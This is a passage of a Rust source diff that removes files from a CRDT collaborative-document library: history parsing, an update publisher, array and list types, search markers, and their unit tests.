// std::thread::sleep(std::time::Duration::from_millis(500));
// let mut sub_map = doc1.create_map().unwrap();
// map.insert("map", sub_map.clone()).unwrap();
// std::thread::sleep(std::time::Duration::from_millis(500));
// sub_map.insert("sub_map_key", "sub_map_value").unwrap();
// std::thread::sleep(std::time::Duration::from_millis(500));
// }
loom_model!({
let mut doc = Doc::default();
doc
.apply_update_from_binary_v1(vec![
1, 1, 1, 1, 40, 0, 1, 0, 11, 115, 117, 98, 95, 109, 97, 112, 95, 107, 101, 121, 1, 119, 13, 115, 117, 98, 95,
109, 97, 112, 95, 118, 97, 108, 117, 101, 0,
])
.unwrap();
let pending_size = doc
.store
.read()
.unwrap()
.pending
.as_ref()
.unwrap()
.structs
.iter()
.map(|s| s.1.len())
.sum::<usize>();
doc
.apply_update_from_binary_v1(vec![
1, 1, 1, 1, 40, 0, 1, 0, 11, 115, 117, 98, 95, 109, 97, 112, 95, 107, 101, 121, 1, 119, 13, 115, 117, 98, 95,
109, 97, 112, 95, 118, 97, 108, 117, 101, 0,
])
.unwrap();
// pending nodes should not grow up after apply same pending update
assert_eq!(
pending_size,
doc
.store
.read()
.unwrap()
.pending
.as_ref()
.unwrap()
.structs
.iter()
.map(|s| s.1.len())
.sum::<usize>()
);
});
}
#[test]
fn test_update_from_vec_ref() {
loom_model!({
let doc = Doc::new();
let mut text = doc.get_or_create_text("text").unwrap();
text.insert(0, "hello world").unwrap();
let mut root = doc.get_or_create_map("root").unwrap();
let mut child = doc.create_map().unwrap();
child.insert("k".to_string(), "v").unwrap();
root.insert("child".to_string(), child.clone()).unwrap();
let update = doc.encode_update_v1().unwrap();
let doc = Doc::try_from_binary_v1(update).unwrap();
let text = doc.get_or_create_text("text").unwrap();
assert_eq!(&text.to_string(), "hello world");
let root = doc.get_or_create_map("root").unwrap();
if let Some(Value::Map(child)) = root.get("child") {
assert!(
matches!(child.get("k"), Some(Value::Any(Any::String(s))) if s == "v"),
"expected nested map value to survive apply_update"
);
} else {
panic!("expected nested map to survive apply_update");
}
});
}
#[test]
#[cfg_attr(any(miri, loom), ignore)]
fn test_apply_update() {
let updates = [
include_bytes!("../fixtures/basic.bin").to_vec(),
include_bytes!("../fixtures/database.bin").to_vec(),
include_bytes!("../fixtures/large.bin").to_vec(),
include_bytes!("../fixtures/with-subdoc.bin").to_vec(),
include_bytes!("../fixtures/edge-case-left-right-same-node.bin").to_vec(),
];
for update in updates {
let mut doc = Doc::new();
doc.apply_update_from_binary_v1(&update).unwrap();
}
}
}
@@ -1,35 +0,0 @@
use std::{
collections::HashMap,
hash::{BuildHasher, Hasher},
};
use super::Client;
#[derive(Default)]
pub struct ClientHasher(Client);
impl Hasher for ClientHasher {
fn finish(&self) -> u64 {
self.0
}
fn write(&mut self, _: &[u8]) {}
fn write_u64(&mut self, i: u64) {
self.0 = i
}
}
#[derive(Default, Clone)]
pub struct ClientHasherBuilder;
impl BuildHasher for ClientHasherBuilder {
type Hasher = ClientHasher;
fn build_hasher(&self) -> Self::Hasher {
ClientHasher::default()
}
}
// use ClientID as key
pub type ClientMap<V> = HashMap<Client, V, ClientHasherBuilder>;
@@ -1,316 +0,0 @@
use std::{collections::VecDeque, sync::Arc};
use serde::{Deserialize, Serialize};
use super::{store::StoreRef, *};
use crate::sync::RwLock;
enum ParentNode {
Root(String),
Node(Somr<Item>),
Unknown,
}
#[derive(Clone, Default)]
pub struct HistoryOptions {
pub client: Option<u64>,
/// Only available when client is set
pub skip: Option<usize>,
/// Only available when client is set
pub limit: Option<usize>,
}
#[derive(Debug, Clone, Default)]
pub struct StoreHistory {
store: StoreRef,
parents: Arc<RwLock<HashMap<Id, Somr<Item>>>>,
}
impl StoreHistory {
pub(crate) fn new(store: &StoreRef) -> Self {
Self {
store: store.clone(),
..Default::default()
}
}
pub fn resolve(&self) {
let store = self.store.read().unwrap();
self.resolve_with_store(&store);
}
pub(crate) fn resolve_with_store(&self, store: &DocStore) {
let mut parents = self.parents.write().unwrap();
for node in store.items.values().flat_map(|items| items.iter()) {
let node = node.as_item();
if let Some(item) = node.get() {
parents
.entry(item.id)
.and_modify(|e| {
if *e != node {
*e = node.clone();
}
})
.or_insert(node.clone());
}
}
}
pub fn parse_update(&self, update: &Update) -> Vec<History> {
let store_items = SortedNodes::new(update.structs.iter().collect::<Vec<_>>())
.filter_map(|n| n.as_item().get().cloned())
.collect::<Vec<_>>();
// make items as reference
let mut store_items = store_items.iter().collect::<Vec<_>>();
store_items.sort_by_key(|item| item.id.clock);
self.parse_items(store_items)
}
pub fn parse_delete_sets(&self, old_sets: &ClientMap<OrderRange>, new_sets: &ClientMap<OrderRange>) -> Vec<History> {
let store = self.store.read().unwrap();
let deleted_items = new_sets
.iter()
.filter_map(|(id, new_range)| {
// diff range if old range exists, or use new range
let range = old_sets
.get(id)
.map(|r| r.diff_range(new_range).into())
.unwrap_or(new_range.clone());
(!range.is_empty()).then_some((id, range))
})
.filter_map(|(client, range)| {
// check items contains in deleted range
store.items.get(client).map(move |items| {
items
.iter()
.filter(move |i| range.contains(i.clock()))
.filter_map(|i| i.as_item().get().cloned())
})
})
.flatten()
.collect();
self.parse_deleted_items(deleted_items)
}
pub fn parse_store(&self, options: HistoryOptions) -> Vec<History> {
let store_items = {
let client = options
.client
.as_ref()
.and_then(|client| client.ne(&0).then_some(client));
let store = self.store.read().unwrap();
let mut sort_iter: Box<dyn Iterator<Item = Item>> = Box::new(
SortedNodes::new(if let Some(client) = client {
store.items.get(client).map(|i| vec![(client, i)]).unwrap_or_default()
} else {
store.items.iter().collect::<Vec<_>>()
})
.filter_map(|n| n.as_item().get().cloned()),
);
if client.is_some() {
// skip and limit only available when client is set
if let Some(skip) = options.skip {
sort_iter = Box::new(sort_iter.skip(skip));
}
if let Some(limit) = options.limit {
sort_iter = Box::new(sort_iter.take(limit));
}
}
sort_iter.collect::<Vec<_>>()
};
// make items as reference
let mut store_items = store_items.iter().collect::<Vec<_>>();
store_items.sort_by_key(|item| item.id.clock);
self.parse_items(store_items)
}
fn parse_items(&self, store_items: Vec<&Item>) -> Vec<History> {
let parents = self.parents.read().unwrap();
let mut histories = vec![];
for item in store_items {
if item.deleted() {
continue;
}
histories.push(History {
id: item.id.to_string(),
parent: Self::parse_path(item, &parents),
content: Value::from(&item.content).to_string(),
action: HistoryAction::Update,
})
}
histories
}
fn parse_deleted_items(&self, deleted_items: Vec<Item>) -> Vec<History> {
let parents = self.parents.read().unwrap();
let mut histories = vec![];
for item in deleted_items {
histories.push(History {
id: item.id.to_string(),
parent: Self::parse_path(&item, &parents),
content: Value::from(&item.content).to_string(),
action: HistoryAction::Delete,
})
}
histories
}
fn parse_path(item: &Item, parents: &HashMap<Id, Somr<Item>>) -> Vec<String> {
let mut path = Vec::new();
let mut cur = item.clone();
while let Some(node) = cur.find_node_with_parent_info() {
path.push(Self::get_node_name(&node));
match Self::get_parent(parents, &node.parent) {
ParentNode::Root(name) => {
path.push(name);
break;
}
ParentNode::Node(parent) => {
if let Some(parent) = parent.get() {
cur = parent.clone();
} else {
break;
}
}
ParentNode::Unknown => {
break;
}
}
}
path.reverse();
path
}
fn get_node_name(item: &Item) -> String {
if let Some(name) = item.parent_sub.clone() {
name.to_string()
} else {
let mut curr = item.clone();
let mut idx = 0;
while let Some(item) = curr.left.get() {
curr = item.clone();
idx += 1;
}
idx.to_string()
}
}
fn get_parent(parents: &HashMap<Id, Somr<Item>>, parent: &Option<Parent>) -> ParentNode {
match parent {
None => ParentNode::Unknown,
Some(Parent::Type(ptr)) => ptr
.ty()
.and_then(|ty| {
ty.item
.get()
.and_then(|i| parents.get(&i.id).map(|p| ParentNode::Node(p.clone())))
.or(ty.root_name.clone().map(ParentNode::Root))
})
.unwrap_or(ParentNode::Unknown),
Some(Parent::String(name)) => ParentNode::Root(name.to_string()),
Some(Parent::Id(id)) => parents
.get(id)
.map(|p| ParentNode::Node(p.clone()))
.unwrap_or(ParentNode::Unknown),
}
}
}
#[derive(Debug, Serialize, Deserialize, PartialEq)]
pub enum HistoryAction {
Insert,
Update,
Delete,
}
#[derive(Debug, Serialize, Deserialize, PartialEq)]
pub struct History {
pub id: String,
pub parent: Vec<String>,
pub content: String,
pub action: HistoryAction,
}
pub(crate) struct SortedNodes<'a> {
nodes: Vec<(&'a Client, &'a VecDeque<Node>)>,
current: Option<VecDeque<Node>>,
}
impl<'a> SortedNodes<'a> {
pub fn new(mut nodes: Vec<(&'a Client, &'a VecDeque<Node>)>) -> Self {
nodes.sort_by(|a, b| b.0.cmp(a.0));
let current = nodes.pop().map(|(_, v)| v.clone());
Self { nodes, current }
}
}
impl Iterator for SortedNodes<'_> {
type Item = Node;
fn next(&mut self) -> Option<Self::Item> {
if let Some(current) = self.current.as_mut()
&& let Some(node) = current.pop_back()
{
return Some(node);
}
if let Some((_, nodes)) = self.nodes.pop() {
self.current = Some(nodes.clone());
self.next()
} else {
None
}
}
}
#[cfg(test)]
mod test {
use super::*;
#[test]
fn parse_history_client_test() {
loom_model!({
let doc = Doc::default();
let mut map = doc.get_or_create_map("map").unwrap();
let mut sub_map = doc.create_map().unwrap();
map.insert("sub_map".to_string(), sub_map.clone()).unwrap();
sub_map.insert("key".to_string(), "value").unwrap();
assert_eq!(doc.clients()[0], doc.client());
});
}
#[test]
fn parse_history_test() {
loom_model!({
let doc = Doc::default();
let mut map = doc.get_or_create_map("map").unwrap();
let mut sub_map = doc.create_map().unwrap();
map.insert("sub_map".to_string(), sub_map.clone()).unwrap();
sub_map.insert("key".to_string(), "value").unwrap();
let history = StoreHistory::new(&doc.store);
let update = doc.encode_update().unwrap();
assert_eq!(history.parse_store(Default::default()), history.parse_update(&update,));
});
}
}
@@ -1,36 +0,0 @@
mod awareness;
mod batch;
mod codec;
mod common;
mod document;
mod hasher;
mod history;
#[cfg(feature = "events")]
mod publisher;
mod store;
mod types;
mod utils;
pub use ahash::{HashMap, HashMapExt, HashSet, HashSetExt};
pub use awareness::{Awareness, AwarenessEvent};
pub use batch::{Batch, batch_commit};
pub use codec::*;
pub use common::*;
pub use document::{Doc, DocOptions};
pub use hasher::ClientMap;
pub use history::{History, HistoryOptions, StoreHistory};
use smol_str::SmolStr;
pub(crate) use store::DocStore;
pub use types::*;
pub use utils::*;
use super::*;
/// NOTE:
/// - We do not use [HashMap::with_capacity(num_of_clients)] directly here
/// because we don't trust the input data.
/// - For instance, what if the first u64 was somehow set a very big value?
/// - A pre-allocated HashMap with a big capacity may cause OOM.
/// - A kinda safer approach is give it a max capacity of 1024 at first
/// allocation, and then let std makes the growth as need.
pub const HASHMAP_SAFE_CAPACITY: usize = 1 << 10;
@@ -1,239 +0,0 @@
use std::{
thread::{current, sleep, spawn},
time::Duration,
};
use log::{debug, trace};
use super::{history::StoreHistory, store::StoreRef, *};
use crate::sync::{Arc, AtomicBool, Mutex, Ordering, RwLock};
pub type DocSubscriber = Box<dyn Fn(&[u8], &[History]) + Sync + Send + 'static>;
const OBSERVE_INTERVAL: u64 = 100;
pub struct DocPublisher {
store: StoreRef,
history: StoreHistory,
subscribers: Arc<RwLock<Vec<DocSubscriber>>>,
observer: Arc<Mutex<Option<std::thread::JoinHandle<()>>>>,
observing: Arc<AtomicBool>,
}
impl DocPublisher {
pub(crate) fn new(store: StoreRef) -> Self {
let subscribers = Arc::new(RwLock::new(Vec::<DocSubscriber>::new()));
let history = StoreHistory::new(&store);
history.resolve();
let publisher = Self {
store,
history,
subscribers,
observer: Arc::default(),
observing: Arc::new(AtomicBool::new(false)),
};
if cfg!(all(
feature = "subscribe",
not(any(feature = "bench", fuzzing, loom, miri))
)) {
publisher.start();
}
publisher
}
pub fn start(&self) {
let mut observer = self.observer.lock().unwrap();
let observing = self.observing.clone();
let store = self.store.clone();
let history = self.history.clone();
if observer.is_none() {
let thread_subscribers = self.subscribers.clone();
observing.store(true, Ordering::Release);
debug!("start observing");
let thread = spawn(move || {
let mut last_update = store.read().unwrap().get_state_vector();
let mut last_deletes = store.read().unwrap().delete_set.clone();
loop {
sleep(Duration::from_millis(OBSERVE_INTERVAL));
if !observing.load(Ordering::Acquire) {
debug!("stop observing");
break;
}
let subscribers = thread_subscribers.read().unwrap();
if subscribers.is_empty() {
continue;
}
let store = store.read().unwrap();
let update = store.get_state_vector();
let deletes = store.delete_set.clone();
if update != last_update || deletes != last_deletes {
trace!(
"update: {:?}, last_update: {:?}, {:?}",
update,
last_update,
current().id(),
);
trace!(
"deletes: {:?}, last_deletes: {:?}, {:?}",
deletes,
last_deletes,
current().id(),
);
history.resolve_with_store(&store);
let (binary, history) = match store.diff_state_vector(&last_update, false) {
Ok(update) => {
drop(store);
let history = history
.parse_update(&update)
.into_iter()
.chain(history.parse_delete_sets(&last_deletes, &deletes))
.collect::<Vec<_>>();
let mut encoder = RawEncoder::default();
if let Err(e) = update.write(&mut encoder) {
warn!("Failed to encode document: {e}");
continue;
}
(encoder.into_inner(), history)
}
Err(e) => {
warn!("Failed to diff document: {e}");
continue;
}
};
last_update = update;
last_deletes = deletes;
for cb in subscribers.iter() {
use std::panic::{AssertUnwindSafe, catch_unwind};
// catch panic if callback throw
catch_unwind(AssertUnwindSafe(|| {
cb(&binary, &history);
}))
.unwrap_or_else(|e| {
warn!("Failed to call subscriber: {e:?}");
});
}
} else {
drop(store);
}
}
});
observer.replace(thread);
} else {
debug!("already observing");
}
}
pub fn stop(&self) {
let mut observer = self.observer.lock().unwrap();
if let Some(observer) = observer.take() {
self.observing.store(false, Ordering::Release);
observer.join().unwrap();
}
}
pub(crate) fn count(&self) -> usize {
self.subscribers.read().unwrap().len()
}
pub(crate) fn subscribe(&self, subscriber: impl Fn(&[u8], &[History]) + Send + Sync + 'static) {
self.subscribers.write().unwrap().push(Box::new(subscriber));
}
pub(crate) fn unsubscribe_all(&self) {
self.subscribers.write().unwrap().clear();
}
}
impl std::fmt::Debug for DocPublisher {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
f.debug_struct("DocPublisher").finish()
}
}
impl Drop for DocPublisher {
fn drop(&mut self) {
self.stop();
self.unsubscribe_all();
}
}
#[cfg(test)]
mod tests {
use super::*;
use crate::sync::AtomicUsize;
#[test]
fn test_parse_update_history() {
loom_model!({
let doc = Doc::default();
let ret = [
vec![vec!["(1, 0)", "test.key1", "val1"]],
vec![vec!["(1, 1)", "test.key2", "val2"], vec!["(1, 2)", "test.key3", "val3"]],
vec![
vec!["(1, 3)", "array.0", "val1"],
vec!["(1, 4)", "array.1", "val2"],
vec!["(1, 5)", "array.2", "val3"],
],
];
let cycle = Arc::new(AtomicUsize::new(0));
// update: 24
// history change by (1, 0) at test.key1: val1
// update: 43
// history change by (1, 1) at test.key2: val2
// history change by (1, 2) at test.key3: val3
// update: 40
// history change by (1, 3) at array.0: val1
// history change by (1, 4) at array.1: val2
// history change by (1, 5) at array.2: val3
doc.subscribe(move |u, history| {
println!("update: {}", u.len());
let cycle = cycle.fetch_add(1, Ordering::SeqCst);
let ret = ret[cycle].clone();
for (i, h) in history.iter().enumerate() {
println!("history change by {} at {}: {}", h.id, h.parent.join("."), h.content);
// lost first update by unknown reason in asan test, skip it if asan enabled
if option_env!("ASAN_OPTIONS").is_none() {
let ret = &ret[i];
assert_eq!(h.id, ret[0]);
assert_eq!(h.parent.join("."), ret[1]);
assert_eq!(h.content, ret[2]);
}
}
});
sleep(Duration::from_millis(500));
let mut map = doc.get_or_create_map("test").unwrap();
map.insert("key1".to_string(), "val1").unwrap();
sleep(Duration::from_millis(500));
map.insert("key2".to_string(), "val2").unwrap();
map.insert("key3".to_string(), "val3").unwrap();
sleep(Duration::from_millis(500));
let mut array = doc.get_or_create_array("array").unwrap();
array.push("val1").unwrap();
array.push("val2").unwrap();
array.push("val3").unwrap();
sleep(Duration::from_millis(500));
doc.publisher.stop();
});
}
}
File diff suppressed because it is too large Load Diff
@@ -1,247 +0,0 @@
use super::*;
impl_type!(Array);
impl ListType for Array {}
pub struct ArrayIter<'a> {
iter: ListIterator<'a>,
pending: Option<PendingArrayValues>,
}
enum PendingArrayValues {
Any { values: Vec<Any>, index: usize },
}
impl Iterator for ArrayIter<'_> {
type Item = Value;
fn next(&mut self) -> Option<Self::Item> {
loop {
if let Some(PendingArrayValues::Any { values, index }) = &mut self.pending {
if *index < values.len() {
let value = values[*index].clone();
*index += 1;
return Some(Value::Any(value));
}
self.pending = None;
}
let item = self.iter.next()?;
if let Some(item) = item.get() {
if !item.countable() {
continue;
}
match &item.content {
Content::Any(values) if !values.is_empty() => {
if values.len() > 1 {
self.pending = Some(PendingArrayValues::Any {
values: values.clone(),
index: 1,
});
}
return Some(Value::Any(values[0].clone()));
}
_ => return Some(Value::from(&item.content)),
}
}
}
}
}
impl Array {
#[inline(always)]
pub fn id(&self) -> Option<Id> {
self._id()
}
#[inline]
pub fn len(&self) -> u64 {
self.content_len()
}
#[inline]
pub fn is_empty(&self) -> bool {
self.len() == 0
}
pub fn get(&self, index: u64) -> Option<Value> {
let (item, offset) = self.get_item_at(index)?;
item.get().and_then(|item| {
// TODO: rewrite to content.read(&mut [Any])
match &item.content {
Content::Any(any) => any.get(offset as usize).map(|any| Value::Any(any.clone())),
_ => Some(Value::from(&item.content)),
}
})
}
pub fn iter(&self) -> ArrayIter<'_> {
ArrayIter {
iter: self.iter_item(),
pending: None,
}
}
pub fn push<V: Into<Value>>(&mut self, val: V) -> JwstCodecResult {
self.insert(self.len(), val)
}
pub fn insert<V: Into<Value>>(&mut self, idx: u64, val: V) -> JwstCodecResult {
self.insert_at(idx, val.into().into())
}
pub fn remove(&mut self, idx: u64, len: u64) -> JwstCodecResult {
self.remove_at(idx, len)
}
}
impl serde::Serialize for Array {
fn serialize<S>(&self, serializer: S) -> Result<S::Ok, S::Error>
where
S: serde::Serializer,
{
use serde::ser::SerializeSeq;
let mut seq = serializer.serialize_seq(Some(self.len() as usize))?;
for item in self.iter() {
seq.serialize_element(&item)?;
}
seq.end()
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_yarray_insert() {
let options = DocOptions::default();
loom_model!({
let doc = Doc::with_options(options.clone());
let mut array = doc.get_or_create_array("abc").unwrap();
array.insert(0, " ").unwrap();
array.insert(0, "Hello").unwrap();
array.insert(2, "World").unwrap();
assert_eq!(array.get(0).unwrap(), Value::Any(Any::String("Hello".into())));
assert_eq!(array.get(1).unwrap(), Value::Any(Any::String(" ".into())));
assert_eq!(array.get(2).unwrap(), Value::Any(Any::String("World".into())));
});
}
#[test]
fn test_yarray_delete() {
let options = DocOptions::default();
loom_model!({
let doc = Doc::with_options(options.clone());
let mut array = doc.get_or_create_array("abc").unwrap();
array.insert(0, " ").unwrap();
array.insert(0, "Hello").unwrap();
array.insert(2, "World").unwrap();
array.remove(0, 2).unwrap();
assert_eq!(array.get(0).unwrap(), Value::Any(Any::String("World".into())));
});
}
#[test]
#[cfg_attr(miri, ignore)]
fn test_ytext_equal() {
use yrs::{Options, Text, Transact};
let options = DocOptions::default();
let yrs_options = Options::default();
loom_model!({
let doc = yrs::Doc::with_options(yrs_options.clone());
let array = doc.get_or_insert_text("abc");
let mut trx = doc.transact_mut();
array.insert(&mut trx, 0, " ");
array.insert(&mut trx, 0, "Hello");
array.insert(&mut trx, 6, "World");
array.insert(&mut trx, 11, "!");
let buffer = trx.encode_update_v1();
let mut decoder = RawDecoder::new(&buffer);
let update = Update::read(&mut decoder).unwrap();
let mut doc = Doc::with_options(options.clone());
doc.apply_update(update).unwrap();
let array = doc.get_or_create_array("abc").unwrap();
assert_eq!(array.get(0).unwrap(), Value::Any(Any::String("Hello".into())));
assert_eq!(array.get(5).unwrap(), Value::Any(Any::String(" ".into())));
assert_eq!(array.get(6).unwrap(), Value::Any(Any::String("World".into())));
assert_eq!(array.get(11).unwrap(), Value::Any(Any::String("!".into())));
});
let options = DocOptions::default();
let yrs_options = Options::default();
loom_model!({
let doc = yrs::Doc::with_options(yrs_options.clone());
let array = doc.get_or_insert_text("abc");
let mut trx = doc.transact_mut();
array.insert(&mut trx, 0, "Hello");
array.insert(&mut trx, 5, " ");
array.insert(&mut trx, 6, "World");
array.insert(&mut trx, 11, "!");
let buffer = trx.encode_update_v1();
let mut decoder = RawDecoder::new(&buffer);
let update = Update::read(&mut decoder).unwrap();
let mut doc = Doc::with_options(options.clone());
doc.apply_update(update).unwrap();
let array = doc.get_or_create_array("abc").unwrap();
assert_eq!(array.get(0).unwrap(), Value::Any(Any::String("Hello".into())));
assert_eq!(array.get(5).unwrap(), Value::Any(Any::String(" ".into())));
assert_eq!(array.get(6).unwrap(), Value::Any(Any::String("World".into())));
assert_eq!(array.get(11).unwrap(), Value::Any(Any::String("!".into())));
});
}
#[test]
#[cfg_attr(miri, ignore)]
fn test_yrs_array_decode() {
use yrs::{Array, Transact};
loom_model!({
let update = {
let doc = yrs::Doc::new();
let array = doc.get_or_insert_array("abc");
let mut trx = doc.transact_mut();
array.insert(&mut trx, 0, "hello");
array.insert(&mut trx, 1, "world");
array.insert(&mut trx, 1, " ");
trx.encode_update_v1()
};
let doc = Doc::try_from_binary_v1_with_options(
update.clone(),
DocOptions {
guid: String::from("1"),
client_id: 1,
gc: true,
},
)
.unwrap();
let arr = doc.get_or_create_array("abc").unwrap();
assert_eq!(arr.get(2).unwrap(), Value::Any(Any::String("world".to_string())))
});
}
}
@@ -1,23 +0,0 @@
use super::*;
pub(crate) struct ListIterator<'a> {
pub(super) _lock: RwLockReadGuard<'a, YType>,
pub(super) cur: Somr<Item>,
}
impl Iterator for ListIterator<'_> {
type Item = Somr<Item>;
fn next(&mut self) -> Option<Self::Item> {
while let Some(item) = self.cur.clone().get() {
let cur = std::mem::replace(&mut self.cur, item.right.clone());
if item.deleted() {
continue;
}
return Some(cur);
}
None
}
}
@@ -1,253 +0,0 @@
mod iterator;
mod search_marker;
pub(crate) use iterator::ListIterator;
pub(crate) use search_marker::MarkerList;
use super::*;
#[derive(Debug)]
pub(crate) struct ItemPosition {
pub parent: YTypeRef,
pub left: ItemRef,
pub right: ItemRef,
pub index: u64,
pub offset: u64,
}
impl ItemPosition {
pub fn forward(&mut self) {
if let Some(right) = self.right.get() {
if right.indexable() {
self.index += right.len();
}
self.left = self.right.clone();
self.right = right.right.clone();
} else {
// FAIL
}
}
/// we found a position cursor point in between a splitable item,
/// we need to split the item by the offset.
///
/// before:
/// ---------------------------------
/// ^left ^right
/// ^offset
/// after:
/// ---------------------------------
/// ^left ^right
pub fn normalize(&mut self, store: &mut DocStore) -> JwstCodecResult {
if self.offset > 0 {
debug_assert!(self.left.is_some());
if let Some(left) = self.left.get() {
let (left, right) = store.split_node(left.id, self.offset)?;
self.left = left.as_item();
self.right = right.as_item();
self.index += self.offset;
self.offset = 0;
}
}
Ok(())
}
}
pub(crate) trait ListType: AsInner<Inner = YTypeRef> {
#[inline(always)]
fn _id(&self) -> Option<Id> {
self.as_inner().ty().and_then(|ty| ty.item.get().map(|item| item.id))
}
#[inline(always)]
fn content_len(&self) -> u64 {
self.as_inner().ty().unwrap().len
}
fn iter_item(&self) -> ListIterator<'_> {
let inner = self.as_inner().ty().unwrap();
ListIterator {
cur: inner.start.clone(),
_lock: inner,
}
}
fn find_pos(&self, inner: &YType, index: u64) -> Option<ItemPosition> {
let mut remaining = index;
let start = inner.start.clone();
let mut pos = ItemPosition {
parent: self.as_inner().clone(),
left: Somr::none(),
right: start,
index: 0,
offset: 0,
};
if pos.right.is_none() {
return Some(pos);
}
if let Some(markers) = &inner.markers
&& let Some(marker) = markers.find_marker(inner, index)
{
if marker.index > remaining {
remaining = 0
} else {
remaining -= marker.index;
}
pos.index = marker.index;
pos.left = marker.ptr.get().map(|ptr| ptr.left.clone()).unwrap_or_default();
pos.right = marker.ptr;
};
// avoid the first item of the list being deleted
while let Some(item) = pos.right.get() {
if item.deleted() {
pos.right = item.right.clone();
continue;
} else {
break;
}
}
while remaining > 0 {
if let Some(item) = pos.right.get() {
if item.indexable() {
let content_len = item.len();
if remaining < content_len {
pos.offset = remaining;
remaining = 0;
} else {
pos.index += content_len;
remaining -= content_len;
}
}
pos.left = pos.right.clone();
pos.right = item.right.clone();
} else {
return None;
}
}
Some(pos)
}
fn insert_at(&mut self, index: u64, content: Content) -> JwstCodecResult {
if index > self.content_len() {
return Err(JwstCodecError::IndexOutOfBound(index));
}
if let Some((mut store, mut ty)) = self.as_inner().write() {
if let Some(mut pos) = self.find_pos(&ty, index) {
pos.normalize(&mut store)?;
Self::insert_after(&mut ty, &mut store, pos, content)?;
}
} else {
return Err(JwstCodecError::DocReleased);
}
Ok(())
}
fn insert_after(ty: &mut YType, store: &mut DocStore, pos: ItemPosition, content: Content) -> JwstCodecResult {
if let Some(markers) = &ty.markers
&& content.countable()
{
markers.update_marker_changes(pos.index, content.clock_len() as i64);
}
let item = store.create_item(
content,
pos.left.clone(),
pos.right.clone(),
Some(Parent::Type(pos.parent)),
None,
);
store.integrate(Node::Item(item), 0, Some(ty))?;
Ok(())
}
fn get_item_at(&self, index: u64) -> Option<(Somr<Item>, u64)> {
if index >= self.content_len() {
return None;
}
let ty = self.as_inner().ty().unwrap();
if let Some(pos) = self.find_pos(&ty, index) {
if pos.offset == 0 {
return Some((pos.right, 0));
} else {
return Some((pos.left, pos.offset));
}
}
None
}
fn remove_at(&mut self, idx: u64, len: u64) -> JwstCodecResult {
if len == 0 {
return Ok(());
}
let content_len = self.content_len();
if content_len == 0 {
return Ok(());
}
if idx >= content_len {
return Err(JwstCodecError::IndexOutOfBound(idx));
}
if let Some((mut store, mut ty)) = self.as_inner().write() {
if let Some(pos) = self.find_pos(&ty, idx) {
Self::remove_after(&mut ty, &mut store, pos, len)?;
}
} else {
return Err(JwstCodecError::DocReleased);
}
Ok(())
}
fn remove_after(ty: &mut YType, store: &mut DocStore, mut pos: ItemPosition, len: u64) -> JwstCodecResult {
pos.normalize(store)?;
let mut remaining = len;
while remaining > 0 {
let item_ref = pos.right.clone();
let Some((indexable, content_len, item_id)) = item_ref.get().map(|item| (item.indexable(), item.len(), item.id))
else {
break;
};
if indexable {
if remaining < content_len {
store.split_node(item_id, remaining)?;
remaining = 0;
} else {
remaining -= content_len;
}
if let Some(item) = item_ref.get() {
store.delete_item(item, Some(ty));
}
}
pos.forward();
}
if let Some(markers) = &ty.markers {
markers.update_marker_changes(pos.index, -((len - remaining) as i64));
}
Ok(())
}
}
@@ -1,333 +0,0 @@
use std::{
cell::RefCell,
cmp::max,
collections::VecDeque,
ops::{Deref, DerefMut},
};
use super::*;
const MAX_SEARCH_MARKER: usize = 80;
#[derive(Clone, Debug)]
pub(crate) struct SearchMarker {
pub ptr: Somr<Item>,
pub index: u64,
}
impl SearchMarker {
fn new(ptr: Somr<Item>, index: u64) -> Self {
SearchMarker { ptr, index }
}
fn overwrite_marker(&mut self, ptr: Somr<Item>, index: u64) {
self.ptr = ptr;
self.index = index;
}
}
unsafe impl Sync for MarkerList {}
/// in yjs, a timestamp field is used to sort markers and the oldest marker is
/// deleted once the limit is reached. this was designed for optimization
/// purposes for v8. In Rust, we can simply use a [VecDeque] and trust the
/// compiler to optimize. the [VecDeque] can naturally maintain the insertion
/// order, allowing us to know which marker is the oldest without using an extra
/// timestamp field.
///
/// NOTE:
/// A [MarkerList] is always belonging to a [YType],
/// which means whenever [MakerList] is used, we actually have a [YType]
/// instance behind [RwLock] guard already, so it's safe to make the list
/// internal mutable.
#[derive(Debug)]
pub(crate) struct MarkerList(RefCell<VecDeque<SearchMarker>>);
impl Deref for MarkerList {
type Target = RefCell<VecDeque<SearchMarker>>;
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for MarkerList {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
impl Default for MarkerList {
fn default() -> Self {
Self::new()
}
}
impl MarkerList {
pub fn new() -> Self {
MarkerList(RefCell::new(VecDeque::new()))
}
// mark pos and push to the end of the linked list
fn mark_position(list: &mut VecDeque<SearchMarker>, ptr: Somr<Item>, index: u64) -> Option<SearchMarker> {
if list.len() >= MAX_SEARCH_MARKER {
let mut oldest_marker = list.pop_front().unwrap();
oldest_marker.overwrite_marker(ptr, index);
list.push_back(oldest_marker);
} else {
let marker = SearchMarker::new(ptr, index);
list.push_back(marker);
}
list.back().cloned()
}
// update mark position if the index is within the range of the marker
pub fn update_marker_changes(&self, index: u64, len: i64) {
let mut list = self.borrow_mut();
for marker in list.iter_mut() {
if len > 0 {
while let Some(ptr) = marker.ptr.get() {
if !ptr.indexable() {
let left_ref = ptr.left.clone();
if let Some(left) = left_ref.get() {
if left.indexable() {
marker.index -= left.len();
}
marker.ptr = left_ref;
} else {
// remove marker
marker.index = 0;
break;
}
} else {
break;
}
}
}
if marker.ptr.is_some() && (index < marker.index || (len > 0 && index == marker.index)) {
marker.index = max(index as i64, marker.index as i64 + len) as u64;
}
}
list.retain(|marker| marker.index > 0);
}
// find and return the marker that is closest to the index
pub fn find_marker(&self, parent: &YType, index: u64) -> Option<SearchMarker> {
if parent.start.is_none() || index == 0 {
return None;
}
let mut list = self.borrow_mut();
let marker = list.iter_mut().min_by_key(|m| (index as i64 - m.index as i64).abs());
let mut marker_index = marker.as_ref().map(|m| m.index).unwrap_or(0);
let mut item_ptr = marker
.as_ref()
.map(|m| m.ptr.clone())
.unwrap_or_else(|| parent.start.clone());
// TODO: this logic here is a bit messy
// i think it can be implemented with more streamlined code, and then optimized
{
// iterate to the right if possible
while let Some(item) = item_ptr.clone().get() {
if marker_index >= index {
break;
}
let right_ref: ItemRef = item.right.clone();
if right_ref.is_some() {
if item.indexable() {
if index < marker_index + item.len() {
break;
}
marker_index += item.len();
}
item_ptr = right_ref;
} else {
break;
}
}
// iterate to the left if necessary (might be that marker_index > index)
